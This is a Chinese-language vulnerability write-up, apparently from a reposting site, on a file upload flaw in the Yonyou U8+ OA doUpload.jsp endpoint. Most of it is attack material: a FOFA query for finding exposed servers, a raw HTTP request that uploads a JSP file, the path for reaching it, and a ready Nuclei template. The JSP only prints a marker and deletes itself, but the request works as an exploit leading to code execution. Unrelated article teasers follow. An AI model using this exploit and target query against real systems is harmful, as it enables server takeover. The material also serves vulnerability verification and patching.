用友U8+OA doUpload.jsp 文件上传漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

用友U8+ OA经过20多年的市场锤炼,不断贴近客户需求,以全新UAP为平台,应对中型及成长型企业客户群的发展,提供的是一整套企业级数智化升级解决方案,为成长型企业构建精细管理、产业链协同、社交化运营为一体的企业互联网经营管理平台,助力企业应势而变,赢得未来。

用友U8+ OA doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。

Ⅱ、fofa语句

"用友U8-OA" && body="yyoa"

Ⅲ、漏洞复现

POC

POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 248
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----syowx9dzsw75xlftuop1

------syowx9dzsw75xlftuop1
Content-Disposition: form-data; name="iconFile";filename="p3jxifcpyb.jsp"

<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>    
------syowx9dzsw75xlftuop1--

1、构建poc

2、访问

http://127.0.0.1/yyoa/portal/upload/1707381374791.jsp

 

Ⅳ、Nuclei-POC

id: yonyou-U8-OA-doUpload-jsp-uploadfile

info:
  name: 用友U8+ OA doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。
  author: WLF
  severity: high
  metadata: 
    fofa-query: ceshi
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /yyoa/portal/tools/doUpload.jsp HTTP/2
        Host:{{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Content-Type: multipart/form-data; boundary=----{{boundary}}
        
        ------{{boundary}}
        Content-Disposition: form-data; name="iconFile";filename="{{filename}}.jsp"
        
        <% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
        ------{{boundary}}--



      - |
        GET /yyoa/portal/upload/{{path}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0

    extractors:
      - type: regex
        name: path
        group: 1
        regex:
           - 'returnValue = \"(\w*)\.jsp'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")

Ⅴ、修复建议

1、设置访问控制策略

2、升级至安全版本

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/378456.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

注意啦,MySQL8.0最新版是没有utf8选项,但是有utf8mb3和utf8mb4选项

注意啦,MySQL8.0最新版是没有utf8选项,但是有utf8mb3和utf8mb4选项

今天在安装完MySQL最新版&#xff08;8.0.36&#xff09;&#xff0c;然后用navicat连接数据&#xff0c;创建数据库的时候&#xff0c;发现: MySQL最新版是没有utf8选项&#xff0c;但是有utf8mb3和utf8mb4选项 然后就只能卸载掉最新版&#xff0c;安装了8.0.28. &#xff08…
阅读更多...
汽车控制臂的拓扑优化

汽车控制臂的拓扑优化

前言 本示例使用优化模块通过减小控制臂的体积同时最大化其刚度来优化汽车控制臂的设计。 本页讨论 前言应用描述Abaqus建模方法和仿真技术文件参考 应用描述 本例说明了汽车控制臂的拓扑优化&#xff0c;在拓扑优化过程中&#xff0c;修改设计区域中单元的材料特性(有效地从…
阅读更多...
Pycharm中以chrome打开HTML文件报错: Windows找不到文件‘Chrome‘

Pycharm中以chrome打开HTML文件报错: Windows找不到文件‘Chrome‘

随笔记录 目录 1. 问题描述 2. 定位问题 3. 解决方法 3.1 获取Chrome 安装路径 3.2 修改Pycharm 中Chrome的配置 4. 校验结果 1. 问题描述 Pycharm中以chrome打开HTML文件报错&#xff1a;Windows 找不到文件chrome如图所示&#xff1a; 2. 定位问题 因为Pycharm中未设…
阅读更多...
Linux大集合

Linux大集合

Linux Linux是什么&#xff1f; Linux是一套免费使用和自由传播的类Unix操作系统&#xff0c;是一个基于POSIX和UNIX的多用户、多任务、 支持多线程和多CPU的操作系统。它能运行主要的UNIX工具软件、应用程序和网络协议。它支持32位和 64位硬件。 Linux内核 是一个Linux系统…
阅读更多...
【万题详解】洛谷P1238 走迷宫

【万题详解】洛谷P1238 走迷宫

题目 有一个 mn 格的迷宫(表示有 m 行、n 列)&#xff0c;其中有可走的也有不可走的&#xff0c;如果用 1表示可以走&#xff0c;0表示不可以走&#xff0c;文件读入这 mn 个数据和起始点、结束点&#xff08;起始点和结束点都是用两个数据来描述的&#xff0c;分别表示这个点…
阅读更多...
Verilog刷题笔记27

Verilog刷题笔记27

题目&#xff1a; Given a 100-bit input vector [99:0], reverse its bit ordering. 解题&#xff1a; module top_module( input [99:0] in,output [99:0] out );int i;always(*)beginfor(i0;i<100;i)out[i]in[99-i];end endmodule结果正确&#xff1a;
阅读更多...
dbeaver免费、跨平台数据管理软件

dbeaver免费、跨平台数据管理软件

下载 dbeaver是一款的数据库连接工具&#xff0c;免费&#xff0c;跨平台。 官网&#xff1a;DBeaver Community | Free Universal Database Tool下载地址&#xff1a;Download | DBeaver Community 点击下载 安装 修改安装路径 点击安装 点击完成 使用 连接mysql 已连接 点…
阅读更多...
C语言的循环结构

C语言的循环结构

目录 前言 1.三种循环语句 1.while循环 2.for循环 2.1缺少表达式的情况 3.do while循环 2.break语句和continue语句 2.1在while循环中 2.2在for循环中 2.3在do while 循环中 3.循环的嵌套 4.go to语句 前言 C语⾔是结构化的程序设计语⾔&#xff0c;这⾥的结构指的是…
阅读更多...
unity-ios-解决内购商品在Appstore上面已配置,但在手机测试时却无法显示的问题

unity-ios-解决内购商品在Appstore上面已配置,但在手机测试时却无法显示的问题

自己这几天用 unity 2021 xcode 14.2 开发ios内购&#xff0c;appstore上面内购商品都已经配置好了&#xff0c;但是在手机里就是不显示&#xff0c;最后才发现必需得满足以下条件才行&#xff1a; 1. Appstore后台 -> 内购商品 -> 商品状态必需为『准备提交』以上状态…
阅读更多...
Unity类银河恶魔城学习记录4-7 P60 Counter‘s attack window 源代码

Unity类银河恶魔城学习记录4-7 P60 Counter‘s attack window 源代码

Alex教程每一P的教程原代码加上我自己的理解初步理解写的注释&#xff0c;可供学习Alex教程的人参考 此代码仅为较上一P有所改变的代码 【Unity教程】从0编程制作类银河恶魔城游戏_哔哩哔哩_bilibili Enemy.cs using System.Collections; using System.Collections.Generic; …
阅读更多...
寒假 day7

寒假 day7

1.现有文件test.cltest1.clmain.c,请编写Makefile CCgcc EXEa.out#patsubst : 把 .c 替换成 .o #wildcard &#xff1a;收集所有的 .c OBJS$(patsubst %.c,%.o,$(wildcard *.c )) CFLAGS-c -oall:$(EXE) $(EXE):$(OBJS)$(CC) $^ -o $#当%表示test时 test.o:test.c #当%表示1…
阅读更多...
【XILINX】各系列FPGA的高速收发器速度及特点

【XILINX】各系列FPGA的高速收发器速度及特点

概述 xilinx收发器产品涵盖了当今高速协议的全部范围。GTH 和 GTY 收发器提供要求严苛的光学互连所需的低抖动&#xff0c;并具有世界一流的自适应均衡功能以及困难的背板操作所需的 PCS 功能。 Versal™ ACAP GTY (32.75Gb/s)&#xff1a;针对延迟和功耗进行了优化Versal ACAP…
阅读更多...
MacOS Mojavev10.14.6

MacOS Mojavev10.14.6

MacOS Mojave v10.14.6系统安装包是一款专为Mac用户设计的操作系统软件包。Mojave是苹果公司为Mac设备开发的一个操作系统版本&#xff0c;它提供了许多新功能和改进&#xff0c;旨在提高Mac用户的使用体验和工作效率。 安装MacOS Mojave v10.14.6系统后&#xff0c;用户可以享…
阅读更多...
6个好看的wordpress模板

6个好看的wordpress模板

简站wordpress服务业通用主题 2023年立秋纪念版&#xff0c;简站wordpress服务行业通用主题&#xff0c;适合服务行业企业官网使用。 https://www.jianzhanpress.com/?p5393 小语种翻译wordpress主题 小语种国家外贸网站建设需要的wordpress主题模板&#xff0c;适合做小语…
阅读更多...
SpringBoot之事务源码解析

SpringBoot之事务源码解析

首先事务是基于aop的&#xff0c;如果不了解aop的&#xff0c;建议先去看下我关于aop的文章: Spring之aop源码解析  先说结论&#xff0c;带着结论看源码。首先&#xff0c;在bean的生命周期中&#xff0c; 执行实例化前置增强&#xff0c;会加载所有切面并放入缓存&#xff0…
阅读更多...
83 CTF夺旗-Python考点SSTI反序列化字符串

83 CTF夺旗-Python考点SSTI反序列化字符串

这里写目录标题 CTF各大题型简介演示案例:CTF夺旗-Python-支付逻辑&JWT&反序列化CTF夺旗-Python-Flask&jinja2&SSTl模版注入CTF夺旗-Python-格式化字符串漏洞&读取对象 涉及资源&#xff1a; 我们这篇文章主要讲的是CTF在web渗透测试方向的3个考点 CTF各大…
阅读更多...
【附代码】NumPy加速库NumExpr(大数据)

【附代码】NumPy加速库NumExpr(大数据)

文章目录 相关文献测试电脑配置数组加减乘除数组乘方Pandas加减乘除总结 作者&#xff1a;小猪快跑 基础数学&计算数学&#xff0c;从事优化领域5年&#xff0c;主要研究方向&#xff1a;MIP求解器、整数规划、随机规划、智能优化算法 如有错误&#xff0c;欢迎指正。如有…
阅读更多...
【教学类-48-02】20240207“年”和“月”和“日”相等(如2012 1212)

【教学类-48-02】20240207“年”和“月”和“日”相等(如2012 1212)

背景需求&#xff1a; 已经制作了对称年月的数字提取&#xff0c; 【教学类-48-01】20240205对称的“年”和“月日”&#xff08;如2030 0302&#xff09;-CSDN博客文章浏览阅读84次。【教学类-48-01】20240205对称的“年”和“月日”&#xff08;如2030 0302&#xff09;htt…
阅读更多...
特征工程:特征提取和降维-上

特征工程:特征提取和降维-上

目录 一、前言 二、正文 Ⅰ.主成分分析 Ⅱ.核主成分分析 三、结语 一、前言 前面介绍的特征选择方法获得的特征&#xff0c;是从原始数据中抽取出来的&#xff0c;并没有对数据进行变换。而特征提取和降维&#xff0c;则是对原始数据的特征进行相应的数据变换&#xff0c;并…
阅读更多...
SERVLET线程模型

SERVLET线程模型

1. SERVLET线程模型 Servlet规范定义了两种线程模型来阐明Web容器应该如何在多线程环境中处理servlet。第一种模型称为多线程模型,默认在此模型内执行所有servlet。在此模型中,每次客户机向servlet发送请求时Web容器都启动一个新线程。这意味着可能有多个线程同时访问servle…
阅读更多...
最新文章

Copyright @ 2022~2023